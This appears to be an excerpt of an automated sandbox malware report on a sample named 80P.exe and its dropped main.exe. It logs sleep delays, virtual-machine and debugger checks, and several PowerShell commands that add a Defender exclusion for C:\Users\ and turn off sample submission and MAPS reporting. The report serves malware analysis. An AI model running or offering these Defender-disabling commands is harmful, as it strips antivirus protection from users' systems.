Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

API coverage: 8.7 %

Source: C:\Users\user\Desktop\80P.exe TID: 6980	Thread sleep time: -23520000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828	Thread sleep count: 5789 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep count: 4067 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep count: 8826 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep count: 697 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 7894 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep count: 1724 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5480	Thread sleep count: 113 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5480	Thread sleep time: -56500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6260	Thread sleep count: 56 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1608	Thread sleep count: 118 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1608	Thread sleep time: -59000s >= -30000s

Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\Desktop\80P.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FF6BFD61CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FF6BFD61CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EBD4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EBD4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EC05013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE0EC05013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE115057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE115057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	20_2_00007FFE133031F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116B6233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE116B6233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116EB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE116EB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11714013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE11714013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11745013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE11745013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE117757B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	31_2_00007FFE117757B3

Source: C:\Users\user\Desktop\80P.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.29.dr	Binary or memory string: VMware
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.29.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.29.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.29.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.29.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.29.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.29.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 80P.exe, 00000001.00000002.2933766235.0000000001223000.00000004.00000020.00020000.00000000.sdmp, jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956108467.000002A565807000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898332419.0000013B440DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: main.exe, 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
Source: Amcache.hve.29.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.29.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.29.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.29.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.29.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.29.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.29.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\80P.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD6DEBE GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

20_2_00007FF6BFD6DEBE

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD68563 strlen,strlen,_mbscpy,strlen,strlen,FreeLibrary,GetProcessHeap,HeapAlloc,_mbscpy,

20_2_00007FF6BFD68563

Source: C:\Users\user\Desktop\80P.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD61131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,

20_2_00007FF6BFD61131

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

20_2_00007FFE0EB49EA7

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
